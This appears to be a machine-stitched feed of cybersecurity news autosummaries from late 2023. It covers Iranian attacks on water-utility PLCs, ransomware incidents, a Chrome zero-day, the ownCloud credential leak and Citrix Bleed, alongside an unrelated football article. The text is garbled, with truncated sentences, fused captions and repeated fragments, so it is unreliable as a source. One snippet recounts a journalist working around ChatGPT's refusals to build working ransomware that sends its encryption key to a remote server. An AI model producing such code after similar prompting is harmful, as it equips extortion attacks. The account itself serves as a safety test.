Dates Code description July 2016 - time of arrest Modifying the Firefox web browser December 2016 Machine Query that lets TrickBot determine the description, manufacturer, name, product, serial number, version, and content of the root file directory of an infected machine August 2016 - December 2018 Code that grabs and saves from the web browser its name, ID, type, configuration files, cookies, history, local storage, Flash Local Shared Objects/LSO (Flash cookies) October 2016 - time of arrest Code that searches for, imports, and loads files in the web browser"s "profile" folders; these contain cookies, storage, history, Flash LSO cookies. "Autosummary:
“If we download the archive and unzip it, we find it contains files (prefixed with “TurtleRansom”) that appear to be compiled for common platforms, including, Windows, Linux, and yes, macOS” reads the analysis published by Wardle. "The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.
The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations.
Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially cr "
Autosummary:
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.SUMMARY The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. On October 18, 2023, the CyberAv3ngers-linked Soldiers of Solomon claimed responsibility for compromising over 50 servers, security cameras, and smart city management systems in Israel; however, majority of these claims were proven false. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. "OpenAI is putting more power into the hands of users of GenAI, allowing them to create their custom AI agents without writing code. These custom GPTs are the latest leap forward in the rapidly evolving AI landscape, but this highly tailorable yet easily accessible capability creates a powerful tool for attackers to exploit. In this Help Net Security video, Tal Zamir, CTO of Perception Point, believes this will be a powerful tool malicious actors will … More
The post What custom GPTs mean for the future of phishing appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Leaked images include medical reports, registration forms, x-rays, medical prescriptions, medical reports, and more The group claims to have stolen data belonging to a large amount of patients and employees, including the Royal Family. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. "Autosummary:
The cybersecurity company, which said it"s responding to "several instances" of exploitation of the software, noted that the attacks are likely taking advantage of three flaws that have been disclosed over the past three months - CVE-2023-41265 (CVSS score: 9.9) - "Autosummary:
The malware was discovered by Promon, whose analysts report that it currently spreads via emails, SMS, and messaging apps targeting banking apps in Indonesia, Thailand, Vietnam, Singapore, and Malaysia. "News that Iran-affiliated attackers have taken over a programmable logic controller (PLC) at a water system facility in Pennsylvania has been followed by a public alert urging other water authorities to immediately secure their own PLCs. “The cyber threat actors likely accessed the affected device—a Unitronics Vision Series PLC with a Human Machine Interface (HMI)—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet,” the Cybersecurity and Infrastructure Security Agency (CISA) noted. … More
The post CISA urges water facilities to secure their Unitronics PLCs appeared first on Help Net Security.
"Autosummary:
"ThreatNG Security launched its new Ransomware Susceptibility Assessment, Reporting, and Monitoring Solution. The new solution helps organizations assess their ransomware susceptibility externally and monitor their networks for potential threats. According to the FBI, ransomware attacks increased by 13% in 2022, and the average cost of a ransomware attack is now $1.85 million. With ransomware attacks rising, organizations of all sizes are at risk, but many are unprepared. The ThreatNG Security Ransomware Susceptibility Assessment, Reporting, and … More
The post ThreatNG empowers organizations to identify and mitigate their ransomware risk appeared first on Help Net Security.
"Autosummary:
The report includes the following sections: Breach and Ransomware Susceptibility Score Internet-facing vulnerabilities and misconfigurations (ransomware infection vector) Phishing (ransomware infection vector) Precursor malware infection (ransomware infection vector) Third parties and managed service providers (ransomware infection vector) These capabilities help organizations of all sizes better understand and manage their ransomware risk by providing a comprehensive view of their security posture and identifying the most relevant ransomware infection vectors. "Autosummary:
"Autosummary:
The healthcare system manages two hospitals (the Regional Medical Center in Trenton and Capital Health Medical Center in Hopewell), an outpatient facility in Hamilton, and dozens of New Jersey primary and specialty care practices. "Autosummary:
To mitigate the risks of a breach, Qlik recommends upgrading to the following versions of Sense Enterprise for Windows: August 2023 Patch 2 May 2023 Patch 6 February 2023 Patch 10 November 2022 Patch 12 August 2022 Patch 14 May 2022 Patch 16 February 2022 Patch 15 November 2021 Patch 17 Cactus ransomware emerged in March this year and adopted the double-extortion tactic, stealing data from victims and then encrypting it on compromised systems. "Autosummary:
The disclosure comes after multiple Reddit reports posted online since Monday reported various Staples internal operation problems, including an inability to access Zendesk, VPN employee portals, print email, use phone lines, and more. "Autosummary:
ChatGPT 4.0 makes its first attempt at troubleshooting a compilation problem ChatGPT 4.0 makes its second attempt at troubleshooting a compilation problem ScreChatGPT 4.0 makes its third attempt at troubleshooting a compilation problemenshot In every case, ChatGPT solved the problem, and in doing so it enabled me, a non-C programmer to write and troubleshoot basic but functional ransomware written in C, in almost no time.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.It encrypts files in whatever directory tree I choose, throws away the originals, hides the private key used for the encryption, stops running databases, and leaves ransom notes.The code used in the demonstration above was generated by ChatGPT in mere minutes, without objection, in response to basic one line descriptions of ransomware features, even though I’ve never written a single line of C code in my life. ChatGPT 4.0 agreeing to write out a complete program instead of snippets (ChatGPT’s answer is truncated) Safeguards removed Although I was able to work around ChatGPT’s insistence it wouldn’t write ransomware in March, I was often met with other restrictions that attempted to stop me doing unsafe things.I wanted to know if its safeguards would stop me from using it to write ransomware, and, if they didn’t, whether the ransomware it produced was any good. ChatGPT 4.0 had no objection to saving the private encryption key to a remote server Programming tutor Much to my surprise, after telling ChatGPT what features I wanted in my ransomware I was left with something that looked very much like a complete computer program. "Autosummary:
Critical Zoom Room bug allowed to gain access to Zoom Tenants Pierluigi Paganini November 30, 2023 November 30, 2023 A critical vulnerability in Zoom Room allowed threat actors to take over meetings and steal sensitive data.For example, if the owner is using an outlook.com email address, the Room’s email address will be room__<account ID>@outlook.com. "Autosummary:
"Autosummary:
The vulnerabilities impact the following devices: iPhone XS and later iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later Macs running macOS "Autosummary:
"Autosummary:
PrivateLoader, for its part, establishes contact with a command-and-control (C2) server to fetch a wide range of stealer and loader malware families like RedLine Stealer, Vidar, Lumma Stealer, Amadey, SmokeLoader, Nymaim, GCleaner, XMRig, and Fabookie, in addition to dropping Xaro. "Autosummary:
"Autosummary:
"Cisco announced new business metrics in Cisco Cloud Observability. Powered by the Cisco Observability Platform to enhance business context for modern applications running on AWS. This latest release also supports integration with AWS services and application performance monitoring (APM) correlation and provides end-to-end visibility into the performance of cloud native applications. Traditional application monitoring tools only provide visibility of application and infrastructure performance metrics. This leaves teams— including ITOps, DevOps and SREs— managing modern applications … More
The post Business metrics for Cisco Cloud Observability capability enables customers to protect revenue appeared first on Help Net Security.
"Autosummary:
Cisco Cloud Observability will allow us to visualize and correlate metrics, events, logging, and tracing (MELT) data so we can identify, triage, and troubleshoot problems at an even greater velocity,” said Alice McElroy, Director, IT Operational Excellence, Royal Caribbean. "Google has released an urgent security update to fix a number of vulnerabilities in Chrome browser, including a zero-day vulnerability (CVE-2023-6345) that is being actively exploited in the wild. About CVE-2023-6345 CVE-2023-6345, reported by Benoît Sevens and Clément Lecigne of Google’s Threat Analysis Group, is due to an integer overflow in Skia – an open source 2D graphics library commonly used as a graphics engine for Google Chrome, ChromeOS, Android, Flutter, and others. The company … More
The post Google fixes Chrome zero day exploited in the wild (CVE-2023-6345) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The phishing campaigns are no less sophisticated, impersonating the actual websites to exfiltrate credentials, account numbers, device models, and IP addresses to two actor-controlled Telegram channels. "Autosummary:
Impacts of a web app compromise Beyond end-user frustration, there are far-reaching consequences of successful attacks against web apps, including: Data breaches that result from unauthorized access to sensitive information. Why continuous monitoring of web apps is essential Not only are modern web applications dynamic and constantly evolving, but so are cyber threat actors and the methods they use. "Autosummary:
The Auth0/CIC support case management system was also not impacted by this incident" - Okta According to the company, the stolen report included fields for full name, username, email, company name, user type, address, last password change/reset, role, phone number, mobile number, time zone, and SAML Federation ID. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Since it emerged, this ransomware gang has infiltrated and extorted many high-profile victims, including the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, Toronto Public Library, and the German defense contractor Rheinmetall. "Autosummary:
"Cyber threat actors are targeting PLCs associated with WWS facilities, including an identified Unitronics PLC, at a U.S. water facility," reads CISA"s alert. "Autosummary:
"Autosummary:
CVE-2023-6345 is the sixth actively exploited zero-day vulnerability in Chrome addressed by Google this year, the other ones are: CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8 (CVSS score: 8.8) – Type Confusion in V8 CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library (CVSS score: 9.6) – Integer overflow in the Skia graphics library CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8 (CVSS score: 8.8) – Type Confusion in V8 CVE-2023-4863 (CVSS score: 8.8) – "Autosummary:
"Autosummary:
Google Chrome is up to date After the update, the version should be listed as 119.0.6045.199 for Mac and Linux, and 119.0.6045.199/.200 for Windows, or later. "This survey set out to explore these challenges, to identify common practices, and to provide insight into how organizations can bolster their defenses. Key findings from the survey include: Current authentication practices Authentication-related cyberattacks Security incidents and impact Password management Security awareness and standards Download report – The state of authentication security 2023
The post Report: The state of authentication security 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Then change the following: Your ownCloud admin password The mail server credentials Database credentials Object-Store/S3 access-key Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure. What to do ownCloud says you should delete the file owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. "Law enforcement and judicial authorities from seven countries have joined forces with Europol and Eurojust to dismantle and apprehend in Ukraine key figures behind significant ransomware operations. On 21 November, 30 properties were searched in the regions of Kyiv, Cherkasy, Rivne and Vinnytsia, resulting in the arrest of the ringleader. Four of the ringleader’s most active accomplices were also detained. More than 20 investigators from Norway, France, Germany and the United States were deployed to … More
The post Ukrainian ransomware gang behind high-profile attacks dismantled appeared first on Help Net Security.
"Autosummary:
"“Malware free” attacks, attackers’ increased reliance on legitimate tools and scripting frameworks, and BEC scams were the most prominent threats small and medium businesses (SMBs) faced in Q3 2023, says the inaugural SMB Threat Report by Huntress, a company that provides a security platform and services to SMBs and managed service providers (MSPs). “Malware free” attacks on the rise Attackers deployed malware in 44% of cases, but the remaining 56% of incidents included use of … More
The post SMBs face surge in “malware free” attacks appeared first on Help Net Security.
"Autosummary:
“Malware free” attacks on the rise Attackers deployed malware in 44% of cases, but the remaining 56% of incidents included use of “living off the land” binaries (LOLBins), scripting frameworks (such as PowerShell) and remote monitoring and management (RMM) software. "Autosummary:
"Autosummary:
The rogue server then receives the challenge, passes it on to the victim, and gets a valid response, which is ultimately transmitted to the sender that challenges the CV as part of the attacker-controlled CV↔ SA authentication process receives valid response and then passes that response to the NTLM server. "Autosummary:
Healthcare provider Ardent Health Services disclosed a ransomware attack Pierluigi Paganini November 28, 2023 November 28, 2023 The US Healthcare provider Ardent Health Services disclosed that it was the victim of a ransomware attack last week. "Slovenian power generation company Holding Slovenske Elektrarne (HSE) has been hit by ransomware and has had some of its data encrypted. The attack HSE is a state-owned company that controls numerous hydroelectric, thermal and coal-fired power plants. The company has declined to share any details about the cyber intrusion, but has confirmed that operation of its power plants has not been affected. “We would like to emphasize that the HSE had control over the power … More
The post Slovenian power company hit by ransomware appeared first on Help Net Security.
"Autosummary:
“Threat actors leveraging Rhysida ransomware are known to impact ‘targets of opportunity,’ including victims in the education, healthcare, manufacturing, information technology, and government sectors,” according to a recently released advisory by the CISA, FBI, and MS-ISAC. "Cybellum announced that Cybellum has significantly increased its market share amongst leading medical device manufacturers (MDMs). Working with companies across the industry, Cybellum’s approach provides risk visibility throughout the full product lifecycle. It also presents opportunities to manage risks so product security teams can make decisions that balance their security demands with business requirements. In today’s complex healthcare landscape with increasing regulatory oversight, medical device manufacturers are facing two main challenges. The first is managing … More
The post Cybellum achieves significant market share growth among leading medical device manufacturers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
It sells interior components to General Motors, the Volkswagen Group, Ford, Stellantis (Fiat, Chrysler, Jeep, Dodge), BMW, Daimler AG, Toyota, Honda, Nissan, and SAIC Motor. "Autosummary:
The Australian Cyber Security Coordinator, the Australian Cyber Security Center, the Australian Federal Police, the Department of Home Affairs, and the Office of the Australian Information Commissioner have all been informed of the situation and are working closely with DP World to lessen the impact for those who had their data stolen. "Autosummary:
The recommended fix is to delete the "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php" file, disable the "phpinfo" function in Docker containers, and change potentially exposed secrets like the ownCloud admin password, mail server, database credentials, and Object-Store/S3 access keys. "Autosummary:
And that’s one big reason why RaaS gangs like Lockbit, Vice Society, and ALPHV love using these attacks so much: LOTL attacks allow ransomware gangs to master the art of blending their criminal activities within normal network operations. "Autosummary:
International police operation dismantled a prominent Ukraine-based Ransomware group Pierluigi Paganini November 28, 2023 November 28, 2023 An international law enforcement operation dismantled the core of a ransomware group operating from Ukraine. "Autosummary:
"Autosummary:
Likely exploited in spyware attacks This high-severity zero-day vulnerability stems from an integer overflow weakness within the Skia open-source 2D graphics library, posing risks ranging from crashes to the execution of arbitrary code (Skia is also used as a graphics engine by other products like ChromeOS, Android, and Flutter). "Autosummary:
We are sharing ownCloud instances we see in our scans (no vuln assessment, only accessibility) in our Device Identification report https://t.co/1uPaaDBQcc Currently over 11K IPs being reported out (we are also working on adding additional fingerprints)https://t.co/kwKF6LY3i0 https://t.co/Qb2ytyJmKv pic.twitter.com/yY7g15bwSa — Shadowserver (@Shadowserver) November 27, 2023 Cybersecurity firm Onyphe downplayed the impact of the attack, it reported that there are only 675 IP addresses exposing phpinfo() out of 19,453 IP addresses exposed. "In this Help Net Security interview, Eddie Zhang, Principal Consultant at Project Black, explores the complex and often controversial world of vulnerability disclosure in cybersecurity. Zhang explores the intricate balancing act that researchers must perform when navigating the interests of various stakeholders, including the public, private companies, and government agencies. He discusses the ethical, legal, and practical implications of different disclosure strategies, ranging from full public disclosure to more discreet, coordinated approaches. The conversation also … More
The post Vulnerability disclosure: Legal risks and ethical considerations for researchers appeared first on Help Net Security.
"Autosummary:
He discusses the ethical, legal, and practical implications of different disclosure strategies, ranging from full public disclosure to more discreet, coordinated approaches. How can researchers balance the interests of different stakeholders, such as the public, companies, and government agencies, when deciding on a disclosure strategy? Zhang explores the intricate balancing act that researchers must perform when navigating the interests of various stakeholders, including the public, private companies, and government agencies. Public interest A common argument for public disclosure relates to ‘people needing to know’ that their data is being mishandled. "Autosummary:
"Despite ongoing discussions with Henry"s team, we have not received any indication of their willingness to prioritize the security of their clients, partners, and employees, let alone protect their own network," the threat actors said. "Autosummary:
"An analysis of the character of aviation incidents from the documents obtained indicates that a number of failures, especially those related to engines, landing gear, and wing mechanics, are of a systemic type." "Autosummary:
" With a workforce comprising 23,000 employees, Ardent oversees operations across 30 hospitals and more than 200 care facilities in Texas, Oklahoma, New Mexico, Kansas, New Jersey, and Idaho and collaborates with over 1,400 affiliated healthcare providers spanning these six states. "Autosummary:
Founded in 2001 by the Government of Slovenia and owned by the state, the firm operates several hydroelectric, thermal, and solar power plants as well as coal mines across the country, while it also owns subsidiaries in Italy, Serbia, and Hungary. "Autosummary:
"Autosummary:
"Autosummary:
In January 2023, Riot Games, the creator of popular titles like "League of Legends" and "Valorant," faced a ransom demand of $10,000,000 from hackers, who threatened to release stolen source code unless the payment was made. "Autosummary:
However, clicking on the link provided in the email or text, supposedly to claim your gift card, may result in malware installation, the compromise of your personal data, or receiving a stolen card.Put simply, your money and/or your personal information, including logins to relevant accounts, which can then be sold on to others to commit identity fraud.If you haven’t heard of one before, do some research on it first – try Googling the name plus “scam” or “fraud,” and check out customer reviews, to assess its reputation.The holiday shopping season may be the time to splurge, but it’s a also favorite time of year for cybercriminals to target shoppers with phony deals, phishing scams and other threats The holiday shopping season is in full swing. Never click on pop-up ads, even if they’re offering tremendous shopping bargains, as the ads are often malicious. "Autosummary:
And if you can find a shirt - and apparently even Inter Miami co-owner David Beckham has been finding it tricky to get some to give to people as gifts - there is logically a dearth of the numbers 1 and 0 and the letters M, E, S and I. Pre Messi, Inter Miami had a stadium with plenty of empty seats. At home, his wife Antonella is helping him settle, finding things out about Miami, such as the best places to eat and enjoy, as well as honing his look and his image off the pitch. Will the arrival into Major League Soccer of Messi, regarded by many as the greatest player in the history of the game, finally burn an indelible brand into America"s sports-mad psyche and establish its place alongside team sports like American football, basketball or baseball, or will it turn out to be another false dawn?With all this marked in, plus the possibility that the country could also be hosting the next Women"s World Cup in 2027, it"s safe to say that if football - sorry, soccer - doesn"t take off in the USA after all that, then it is difficult to imagine when it ever will. In front of a capacity crowd of 20,000, including the likes of LeBron James, Serena Williams and Kim Kardashian watching on from luxury suites, he scored a stoppage time free-kick winner to seal a 2-1 win over Liga MX side Cruz Azul.That said, he has spoken more than ever, twice after a game for Apple TV, five individual interviews after the August press conference, as well as in the big presentation on his arrival. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: PolarDNS: Open-source DNS server tailored for security evaluations PolarDNS is a specialized authoritative DNS server that allows the operator to produce custom DNS responses suitable for DNS protocol testing purposes. Open-source AV/EDR bypassing lab for training and learning Best EDR Of The Market is a user-mode endpoint detection and response (EDR) project designed to serve as a testing ground for … More
The post Week in review: LockBit exploits Citrix Bleed, Apache ActiveMQ bug exploited for cryptojacking appeared first on Help Net Security.
"Autosummary:
Why boards must prioritize cybersecurity expertise In this Help Net Security video, Graeme Payne, US Advisory Service Leader at Kudelski Security, discusses how, with the incredible number of complex threats facing modern businesses, board members must take an increased role in cybersecurity decisions – or face the consequences. "Autosummary:
"Based on the type and information within an HTTP request, specific functions are activated," Degirmenci said, adding "the GET parameters used in the hrserv.dll file, which is used to mimic Google services, include "hl."" This is likely an attempt by the threat actor to blend these rogue requests in network traffic and make it a lot more challenging to distinguish malicious activity from benign events. "Autosummary:
(CVSS score: 10.0) WebDAV Api Authentication Bypass using Pre-Signed URLs impacting core versions from 10.6.0 to 10.13.0 (CVSS score: 9.8) Subdomain Validation Bypass impacting oauth2 prior to version 0.6.1 (CVSS score: 9.0) "The "graphapi" app relies on a third-party library that provides a URL. "Autosummary:
North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply chain attack Pierluigi Paganini November 25, 2023 November 25, 2023 UK and South Korea agencies warn that North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply-chain attack The National Cyber Security Centre (NCSC) and Korea’s National Intelligence Service (NIS) released a joint warning that the North Korea-linked Lazarus hacking group is exploiting a zero-day vulnerability in the MagicLine4NX software to carry out supply-chain attacks. "Autosummary:
"Autosummary:
“Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "Autosummary:
"In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command-and-control server) URLs." SysJoker was publicly documented by Intezer in January 2022, describing it as a backdoor capable of gathering system information and establishing contact with an attacker-controlled server by accessing a text file hosted on Google Drive that contains a hard-coded URL. "Autosummary:
North Korea-linked Konni APT uses Russian-language weaponized documents Pierluigi Paganini November 24, 2023 November 24, 2023 North Korea-linked Konni APT group used Russian-language Microsoft Word documents to deliver malware. "Autosummary:
"Autosummary:
The recommended fix is to delete the "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php" file, disable the "phpinfo" function in Docker containers, and change potentially exposed secrets like the ownCloud admin password, mail server, database credentials, and Object-Store/S3 access keys. "Autosummary:
In March 2023, it was discovered that "Labyrinth Chollima," a subgroup of Lazarus, conducted a supply chain attack against VoIP software maker 3CX to breach multiple high-profile companies worldwide. "Autosummary:
O"Neil Patient, one of CTS" clients, told Property Industry Eye that the outage "is impacting a number of organisations across the sector, as our provider is a specialist in secure legal systems for many law firms and barrister"s chambers. "Autosummary:
" Choosing a Mammoth for a buyer scam is a deliberate process that takes into account the victim"s gender, age, experience in online marketplaces, rating, reviews, number of completed trades, and the type of items they are selling, indicating a preparatory stage that involves extensive market research. "Autosummary:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerability: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19 NetScaler ADC 13.1-FIPS before 13.1-37.164 NetScaler ADC 12.1-FIPS before 12.1-55.300 NetScaler ADC 12.1-NDcPP before 12.1-55.300 NetScaler ADC and NetScaler Gateway version 12.1 are now End-of-Life (EOL) and also vulnerable. The advisory provides Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IoCs) obtained from FBI, the Australian Cyber Security Centre (ACSC), and voluntarily shared by Boeing. "Bots and human fraud farms were responsible for billions of attacks in the H1 of 2023 and into Q3, according to Arkose Labs. These attacks comprised 73% of all website and app traffic measured. In other words, almost three-quarters of traffic to digital properties is malicious. Researchers assessed the attacks across three primary attack vectors: basic bots, intelligent bots, and human fraud farms. Fraudsters use these vectors to launch attack types such as SMS toll … More
The post Cybercriminals turn to ready-made bots for quick attacks appeared first on Help Net Security.
"Autosummary:
Bad actors were attempting to drain account balances through ATO attacks, while online fake accounts were most likely the preferred methods to launder illicit proceeds gained from real-world crimes like human trafficking, drug dealing, or weapon sales.Fraudsters use these vectors to launch attack types such as SMS toll fraud, web scraping, card testing, credential stuffing, and more. "Autosummary:
"This malicious file is a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload," the Microsoft Threat Intelligence team said in an analysis on Wednesday. "Autosummary:
Leveraging a templated incident response plan to establish roles and responsibilities for all participants — security leaders, operations managers, help desk teams, identity and access managers, as well as audit, compliance, communications, and executives — can ensure efficient coordination. Bonus step: Investigation Goal: Determine who, what, when, where, why, how. During the identification phase, you will document all indicators of compromise (IOCs) gathered from alerts, such as compromised hosts and users, malicious files and process, new registry keys, and more.This isn"t always possible, however, so you may need to take measures like patching, changing passwords, killing specific services, and more. With the containment phase complete, you can move to eradication, which can be handled through either disk cleaning, restoring to a clean backup, or full disk reimaging. Now that the incident is comfortably behind you, it"s time to reflect on each major IR step and answer key questions, there are plenty of questions and aspects that should be asked and reviewed, below are a few examples: Identification: How long did it take to detect the incident after the initial compromise occurred? Short-term: This includes steps you might take in the moment, like shutting down systems, disconnecting devices from the network, and actively observing the threat actor"s activities. Also, using an endpoint detection and response (EDR) platform or extended detection and response (XDR) tool with centralized control will let you quickly take defensive actions like isolating machines, disconnecting them from the network, and executing counteracting commands at scale. "Autosummary:
"Web shells allow attackers to run commands on servers to steal data or use the server as a launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization," Microsoft said back in 2021. "Autosummary:
Below is the list of organizations with the highest number of impacted individuals: Organization Individuals Maximus 11 million Pôle emploi 10 million Louisiana Office of Motor Vehicles 6 million Colorado Department of Health Care Policy and Financing 4 million Oregon Department of Transportation 3.5 million Teachers Insurance and Annuity Association of America 2.6 million Genworth 2.5 million PH Tech 1.7 million Milliman Solutions 1.2 million Wilton Reassurance Company 1.2 million “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.” "Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "Autosummary:
" The Visual Basic for Application (VBA) macro subsequently proceeds to launch an interim Batch script that performs system checks, User Account Control (UAC) bypass, and ultimately paves the way for the deployment of a DLL file that incorporates information gathering and exfiltration capabilities. "Autosummary:
"The malware itself is split into multiple components, including a loader, injector, downloader and backdoor, and successful requests to C2-controlled servers are often necessary to retrieve the next stage," IBM X-Force researchers Charlotte Hammond, Ole Villadsen, and Kat Metrick said. "Autosummary:
"Autosummary:
Cyber Monday you can enroll in any Zero2Automated course/bundle, for 25% off - this discount is store wide, so that includes our Ultimate Malware Reverse Engineering Bundle, consisting of the Beginner Malware Analysis Course, Zero2Hero, and Zero2Automated: "Autosummary:
We found an ad on Facebook offering a Stanley Quencher for the low price of $19: Facebook ad for Stanley Quenchers Normally these Stanley cups sell for $45 on Amazon. Facebook comments of people claiming they received the goods As always, use your best spidey senses to pick up on scams like these. "Autosummary:
The group health plans of Stanford Health Care, of Stanford Health Care, Lucile Packard Children’s Hospital Stanford, Stanford Health Care Tri-Valley, Stanford Medicine Partners, and Packard Children’s Health Alliance The Guthrie Clinic In August, cybersecurity firm Emsisoft shared disconcerting details about the recent, massive hacking campaign conducted by the Cl0p ransomware group that targeted the MOVEit Transfer file transfer platform designed by Progress Software Corporation. "Autosummary:
"In this Help Net Security video, Graeme Payne, US Advisory Service Leader at Kudelski Security, discusses how, with the incredible number of complex threats facing modern businesses, board members must take an increased role in cybersecurity decisions – or face the consequences.
The post Why boards must prioritize cybersecurity expertise appeared first on Help Net Security.
"Autosummary:
"Despite a 25% increase of the cost of major cyber incidents in 2022 compared to 2021, the new report on cybersecurity investment from ENISA reveals a slight increase of 0,4% of IT budget dedicated to cybersecurity by EU operators in scope of the NIS Directive. Organizations face information security recruitment challenges However, if organizations are inclined to allocate more budget to cybersecurity, 47% of the total of organizations surveyed do not plan to hire information … More
The post Organizations rethink cybersecurity investments to meet NIS Directive requirements appeared first on Help Net Security.
"Autosummary:
OES provide essential services in strategic sectors of energy (electricity, oil and gas), transport (air, rail, water and road), banking, financial market infrastructures, health, drinking water supply and distribution, and digital infrastructure (Internet exchange points, domain name system service providers, top-level domain name registries). Organizations face information security recruitment challenges However, if organizations are inclined to allocate more budget to cybersecurity, 47% of the total of organizations surveyed do not plan to hire information security Full Time Equivalents (FTEs) in the next two years. "Autosummary:
"The Cybersecurity and Infrastructure Security Agency (CISA) has announced a pilot program that aims to offer cybersecurity services to critical infrastructure entities as they have become a common target in cyberattacks. “In alignment with CISA’s ‘Target Rich, Resource Poor’ strategy, our teams are working with critical infrastructure entities in the healthcare, water, and K-12 education sectors in our first phase of deployment. This year, we plan to deliver services to up to 100 entities,” said … More
The post CISA offers cybersecurity services to non-federal orgs in critical infrastructure sector appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Browser Guard Available for both Windows and Mac, Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. What you get with our apps: Android: Scan for viruses and malware, and detect ransomware, android exploits, phishing scams, and even potentially unwanted apps.Read the 25 most popular websites vs Malwarebytes Browser Guard Malwarebytes Identity Theft Protection Newly released, Malwarebytes Identity Theft Protection scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit (US only) — and it’s all backed by an up-to-$2 million identity theft insurance. "CVE-2023-4966, aka “Citrix Bleed”, has been exploited by LockBit 3.0 affiliates to breach Boeing’s parts and distribution business, and “other trusted third parties have observed similar activity impacting their organization,” cybersecurity and law enforcement officials have confirmed on Tuesday. In a joint cybersecurity advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and officials from the Australian Cyber Security Center (ACSC) have shared the tactics, techniques, and procedures and indicators of compromise (IoCs) shared … More
The post How LockBit used Citrix Bleed to breach Boeing and other targets appeared first on Help Net Security.
"Autosummary:
